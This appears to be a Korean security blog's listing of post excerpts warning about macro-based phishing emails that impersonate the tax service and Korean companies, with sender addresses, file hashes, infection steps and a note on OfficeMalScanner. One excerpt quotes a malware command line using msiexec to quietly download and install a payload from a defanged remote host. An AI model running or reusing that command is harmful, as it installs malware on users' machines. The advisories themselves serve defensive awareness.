태군 코드 : Security, travel & communication

최근 타켓형 악성메일과 특정 기업을 사칭한 악성메일이 꾸준히 발생을 하고 있으므로, 사용자들의 주의가 필요할것으로 보입니다. 발신자 : doaa.shaban@ten.tv (지속적으로 변경되고 있음) 제목 : 통보 76386154-20191203 (변경가능) 첨부파일명 : 통보 76386154-20191203.doc (변경가능) 해당 메일확인시 통보 (임의숫자).doc 파일을 포함하고 있으며, 본문에는 업무성 메일로 위장을 하고 있어 사용자가 첨부파일을 열도록 유도를 하고 있습니다. 문서를 열경우 파워쉘을 이용하여 악성파일을 다운로드 받으며, 해당 악성파일은 추가로 외부와통신을 하여 추가 악성행위를 수행하도록 설정되어 있습니다. filename: C:\Users\admin\105.exe md5: 48ca1..

국세청을 위장한 악성메일이 추가로 발견 되었습니다. 발신자 : david@mustix.com 외 다수 제목 : 국세청송장, 송장, 과세 요청 외 다수 첨부파일명 : eTaxInvoice_654281.html (변경될수 있음) 메일의 본문을 살펴보면 기존과는 다르게 html 파일을 첨부하고 있으며, 보안장비를 우회하려는 것으로 보입니다. 첨부된 html 파일의 내용입니다. 첨부파일 실행시 특정 URL을 호출하여 기존과 동일한 매크로 형태의 엑셀 파일을 다운로드 받게 이루어져 있습니다. 확일결과 해당 메일은 정보탈취형 악성코드로 확인이 되며 메일 실행 절차는 다음과 같습니다. 1. 국세청을 사칭한 첨부된 html 파일 실행 2. 특정 URL로 연결되어 다운로드 경고창 발생 다운로드 실행시 악성 매크로가 포함..

엑셀파일(.xls)을 포함한 악성메일이 지속적으로 증가하고 있어 사용자들의 각별한 주의가 필요할 것으로 보입니다. 발신자 : alva.kao@psamc.com 외 다수제목 : 초대첨부파일 : 973F68.xls (임의의 숫자) 메일 본문 내용은 국세법을 위반하였으니 피고인 자격으로 국세청에 출두해야 된다는 내용이 포함되어 있으며, 사용자가 첨부파일을 열어보도록 유도를 하고 있습니다. 첨부파일을 실행하면 다음과 같은 화면이 뜨면서 상단부분에 콘텐츠 사용하기라는 버튼이 표시 됩니다. 콘텐츠 사용하기 버튼을 누를경우 매크로가 실행되면서 악성코드 유포지로 접속을하여 특정파일을 내려받아 악성행위를 수행하고 있습니다. 악성행위 순서#10x9c8excel.exe"C:\Program Files\Microsoft Off..

발신자 : paraic.hickey@dunbarlunn.com 외 다수 제목 : 서류 첨부파일명 : 1333327437141.xls (숫자 변경) 해당 메일은 본문내용 없이 '삼성 갤럭시 스마트폰에서 보냈습니다.'라는 문구와 숫자로 된 엑셀파일이 첨부되어 있습니다. 첨부된 엑셀 파일을 실행시키면 엑셀창이 뜨면서 '콘텐츠 사용' 이라는 보안경고 창이 활성화 되고 매크로 사용을 유도 하고 있습니다. 보안 경고를 무시하고 '콘텐츠 사용'을 누를경우 매크로를 수행해 외부로 부터 악성코드가 다운로드 됩니다. "msiexec.exe" with commandline "RESTART=AUTO /i hxxp://velquene.net/mshost1 /q ADRESS='%TMP%'" 현재 다수의 백신에서 미탐지 중이며, ..

최근 한솔제지를 사칭한 신종 랜섬웨어가 유포되고 있는 정황이 확인 되었습니다. 발신자 : penny@amerathon.com 외 다수 제목 : 한솔제지(주) 발주서 송부 첨부파일명 : 구매오더4500286249.xls 파일해시값 dccf4808f742270c24b709f8813d02e2d39a645bb852306e9ef5eae0bd52554e 메일에는 구매오더4500286249.xls 첨부파일이 포함되어 있습니다. 해당 파일을 실행시킬 경우 악성매크로 허용을 유도 하고 있으며, 매크로 실행시 202.168.154.158 접속후 임시폴더에 lib1 이라는 악성파일을 다운로드 받습니다. 해당파일은 Microsoft Installer 형태를 가지고 있으며, 윈도우 정상 인스톨러 msiexec.exe를 통해 해..

악성매크로를 포함한 메일이 대량으로 유포되고 있어 주의가 필요할 것으로 보입니다. 발신자 : 다수의 발신자제목 : 인보이스첨부파일 : image001.jpg A255410.WIZ 발신자 : 다수의 발신자제목 : 인보이스첨부파일 : image001.jpg A330421.xls 메일을 보시면 이진테크라는 회사를 사칭해 대량으로 악성 메일이 유포되고 있습니다. 첨부파일에는 .xls, .WIZ 파일이 각각 포함되어 있습니다. wiz 파일을 이용한 공격은 워드 파일과 마찬가지로 매크로를 악용하는 공격 방식으로, .wiz 파일은 일반적으로 워드와 연결되어 있기 때문에 사용자가 더블 클릭을 할 경우 office의 '제한된 보기'를 통해 열리게 됩니다. 해당 첨부된 파일을 실행하면 [콘텐츠 사용] 버튼을 누르라는 내용..

최근 다양한 형태의 악성매크로 파일을 포함하여 악성메일이 유포되고 있어 주의가 필요할 것으로 보입니다. 발신자 : 다수의 발신자제목 : 송장_00190821 / 요청한 문서 / No subject (제목없음)첨부파일명 : 송장_00190821.doc / temp_[13자리 숫자]_[10자리숫자].xls / 2019-02-19_0841.zip 메일을 살펴보시면 시루정보의 정재민 차장을 사칭하는 명함이 포함되어 있고, 송장_00190821.doc 문서파일을 첨부하고 있습니다. 첨부파일을 실행 시키면 상단에 노란색 보안경고 창이 나타나며 [사용하기]를 누를경우 악성 매크로를 수행하게 이루어져 있습니다. 첨부파일의 속성을 보시면 실제 매크로가 포함되어 있는것을 알수 있으며, 최종 수정 일시는 19일 새벽에 추측..

최근 연말정산 시즌을 겨냥하여 악성메일이 유포되고 있어 주의가 필요할 것으로 보입니다. 발신자 - helpdesk@hometaxkorea3.com- 1414jh@naver.com 메일제목- 2018년도 연말정산 변경사항 안내 첨부파일명- 2018년 연말정산 안내.doc- 메일본문내 링크 메일본문 내용은 2017년과 2018년 연말정산 내용에 차이가 있으니 확인하라는 내용으로 이루어져 있습니다. 해당 doc 문서를 열면 매크로를 실행하게 되어 있으며, 해당 매크로를 실행시 악성행위가 이루어 집니다. 또한 첨부파일이 없이 본문내 링크를 달아 URL접근을 유도하는 경우도 발견되어 더욱 주의가 필요할 것으로 보입니다. 메일 제목, 발신자, 내용 등은 수시로 바뀔수 있습니다.

OfficeMalScanner.exe는 간단히 설명드리면 악성 매크로 파일에 대해 소스코드를 추출하여 분석할수 있는 하나의 툴이라고 생각하시면 되십니다. 악성매크로 파일은 인터넷을 검색하면 구하실수 있으며 직접 코드 추출까지 해보시길 바랍니다. 다운로드 : OfficeMalScanner.zip OfficeMalScanner을 실행한 화면 입니다. 기본 형식OfficeMalScanner 옵션scan : 쉘 코드, 암호화된 PE 파일 스캔info : OLE 구조와 오프셋|길이 덤프, VBA 매크로 코드 저장inflate : MS Office 2007 문서를 임시 폴더에 압축 풀기brute : 암호화된 요소 찾기debug : HEX 디어셈블리로 출력 먼저 해당 악성파일의 bin 파일을 추출하여 줍니다. Off..